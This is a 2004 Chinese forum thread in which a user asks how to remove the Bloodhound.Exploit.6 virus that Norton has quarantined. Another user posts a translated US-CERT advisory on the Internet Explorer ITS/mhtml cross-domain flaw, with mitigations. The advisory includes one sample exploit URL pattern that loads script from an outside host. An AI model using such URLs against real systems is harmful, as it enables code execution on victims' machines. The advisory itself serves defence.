关闭广告
晋江论坛网友交流区电脑扫盲班
主题:电脑中了Bloodhound.Exploit.6病毒 [3]
收藏该贴
已收藏
只看楼主
快帮帮我啊!我电脑中了Bloodhound.Exploit.6病毒,我用的是诺顿,现在病毒在隔离区,怎麽杀啊?
№0 ☆☆☆zzzz 2004-10-06 23:14:42留言☆☆☆  加书签 不再看TA

诺顿隔离得文件是不需要担心得,诺顿比较负责的地方就是无论什么病毒,在杀除得时候都会备份到隔离区,这只是为了在万一杀毒时误删文件所作得备份,你要是不想要直接清空隔离区文件就可以了
№1 ☆☆☆slayer2004-10-06 23:37:35留言☆☆☆ 
加书签 引用 不再看TA

有什么症状呀???
№2 ☆☆☆快乐小豆包2004-10-06 23:38:51留言☆☆☆ 
加书签 引用 不再看TA

谢谢slayer
现在还没发现什麽症状,怕的是像定时炸弹一样不知道什麽时候就爆发了
我是在上西祠胡同时染上的,在网上查了下对此病毒的描述是
(太长太复杂了,我也看不懂,也不会查杀,贴上让大家注意一下)
★Bloodhound.Exploit.6病毒专题★
一、安全公告编号
  US-CERT:TA04-099A
二、影响范围
  运行Internet Explorer的 Microsoft Windows 系统
三、漏洞描述
  ITS 协议处理机制中存在一个交叉域脚本漏洞,ITS协议处理机制决定了存储在一个已编译HTML帮助 (CHM)文件中HTML组件的安全域。HTML帮助系统"……运用Microsoft Internet Explorer下列组件显示帮助内容。他支持HTML, ActiveX, Java,和脚本语言(JX X X X X, 和Microsoft Visual Basic X X X X Xing Edition)。"CHM文件运用InfoTech Storage (ITS)格式存储HTML 文件, graphic 文件, 和ActiveX 对象这一类的组件。IE提供多种协议处理程序,能够访问ITS文件和单独的CHM组件:its:, ms-its:, ms-itss:,以及mk:@MSITStore:。IE也有访问部分运用mhtml:协议处理机制的MIME封装的HTML集合文件包(MHTML)的能力。
  当IE引用一个使用ITS和mhtml:协议的不可访问或是不存在的MHTML文件时,ITS协议处理机制能够通过一个替代资源访问到CHM文件。IE错误地将CHM文件看作和不可使用的MHTML文件在同一个域中。运用特殊处理的URL,攻击者能够导致CHM文件中的任意脚本在不同域中执行,这与交叉域的安全模式相违背。
  任何使用WebBrowser ActiveX 控件或是IE HTML 翻译机制 (MSHTML)的程序会受到此漏洞影响。例如Internet Explorer, Outlook, 和 Outlook Express 都是此类程序。任何程序,包括其他网络浏览器,使用这个IE协议处理机制(URL名字)的都可以被攻击。同样,由于IE决定MIME类型,HTML和CHM文件不会有预期的文件扩展名(.htm/.html/.chm )。
  注意:
  使用替代的网络浏览器不会减轻此漏洞的危害。使用与Windows 系统中调用IE来处理ITS协议URLs机制不同的其他网络浏览器也许可以避免这个漏洞。
四、危害描述
  通过诱导受害者去浏览一个HTML文档例如网页或者HTML的邮件信息,攻击者能在包含攻击文档的域以外的域中运行脚本。通过在Local Machine域中运行脚本,攻击者能够利用运行IE的用户的权限执行任意代码。攻击者也可以读取或更改其他网站数据(包括读取cookies 或内容以及更改或者创建内容)。
  现已存在针对此漏洞的攻击代码。US-CERT已经监测到的安全事件表明这个漏洞已经被利用。Ibiza trojan, W32/Bugbear的变种和BloodHound.Exploit.6 是利用此漏洞的恶意代码中的一些例子。值得注意的是任意执行的恶意代码经此漏洞传递,不同的防病毒厂商能够以不同的名称识别这些恶意代码。
  一个恶意网址或邮件信息可能包含类似如下内容的HTML:ms_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html
  (此 URL故意进行了修正避免防病毒软件的检测)
  在这个例子中,HTML和exploit.html中的脚本将会在Local Machine 域的安全上下文中执行。exploit.html通常会包含或者下载一个可运行的净荷,例如,后门、特洛伊木马、病毒或其他恶意代码。
  注意,通过加密URL可能绕过HTTP内容检查或防病毒软件。
五、解决方案
  现在没有针对这个漏洞的完整解决方案。在补丁发布之前,可以参照下面的列表内容来预防。
  1.关闭ITS协议处理
  关闭ITS协议处理程序目的在于避免该漏洞被利用。删除或修改下面的注册键名称: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
  关闭这些协议处理程序将明显的减少Windows帮助系统的功能,并且可能导致其它的意外结果。在相关补丁测试并安装之后,应该撤消这些修改。
  2.遵循好的互联网安全惯例。
  这些推荐的安全措施将帮助减少被攻击的可能和减轻交叉域漏洞的影响。
  3.关闭活动脚本和ActiveX控件
  注意: 关闭活动脚本和ActiveX控件可能不会阻止该漏洞被利用。
  在Local Machine域中关闭活动脚本和ActiveX控件可以停止一些类型的攻击和阻止利用不同的交叉域漏洞。在任何用来阅读HTML邮件的域中关闭活动脚本和ActiveX控件。
  在Local Machine域中关闭活动脚本和ActiveX控件可以阻止某些利用活动脚本和ActiveX控件的恶意代码的运行。改变这些设置可能会减少脚本,Applet,Windows组件或者其他应用程序的功能。请参阅微软知识库833633号文章了解Local Machine Zone 安全设置的具体信息。注意在Windows XP SP2中包括了这个改变。
  4.不要使用未确定的链接
  不要点击在邮件,即时信息,web论坛或者IRC频道中的不确URL.。
  5.维护升级防病毒软件
  升级病毒定义库后的防病毒软件可以识别和阻止一些攻击企图。各种各样的刺探和攻击不可能完全被侦测到。不要指望单单依赖防病毒软件就可以防止该漏洞。更多的病毒及反病毒软件信息可以从http://www.us-cert.gov/other_sources/viruses.html网站获得
六、参考
  US-CERT安全公告TA04-099A:http://www.us-cert.gov/cas/techalerts/TA04-099A.html  
  
  
№3 ☆☆☆zzzz2004-10-07 00:03:58留言☆☆☆ 
加书签 引用 不再看TA

回复此贴子

名字:
选择图案:
内容:
(注意:一次最多可提交3000字,且一次最多可提交三张尺寸在1024*1024范围内的图片,超出部分请分次提交!)
图片链接:
(贴图规则)


返回上层 管理 返回本版块首页返回交流区首页返回主页

 

只看楼主